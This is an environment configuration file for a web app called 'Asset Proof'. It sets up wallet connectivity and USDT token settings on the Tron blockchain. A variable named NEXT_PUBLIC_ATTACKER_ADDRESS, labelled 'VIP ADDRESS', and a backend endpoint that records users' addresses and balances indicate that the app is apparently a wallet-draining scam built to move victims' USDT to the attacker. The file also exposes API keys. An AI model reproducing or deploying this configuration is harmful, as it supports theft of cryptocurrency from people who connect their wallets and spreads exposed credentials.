# SET ALL VARIABLES
NEXT_PUBLIC_WALLETCONNECT_PROJECT_ID=b18ee0b3771d68564f8f5639949941e5
NEXT_PUBLIC_TRONGRID_API_KEY=4e836296-0309-4890-9fb0-8fb6c63021ec
NEXT_PUBLIC_USDT_ADDRESS=TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t
NEXT_PUBLIC_APP_NAME="Asset Proof"
NEXT_PUBLIC_APP_URL="https://assetproof.org/"
NEXT_PUBLIC_TELEGRAM_USERNAME="chickendevz"
NEXT_PUBLIC_BACKEND_URL="https://algobot.cloud"
# VIP ADDRESS
NEXT_PUBLIC_ATTACKER_ADDRESS=TDuM1SzZfv9yKyswXrZ1fRgeToqwLDV94V
# name like this: NEXT_PUBLIC_

# https://algobot.cloud/backend/{address}/user/{balance}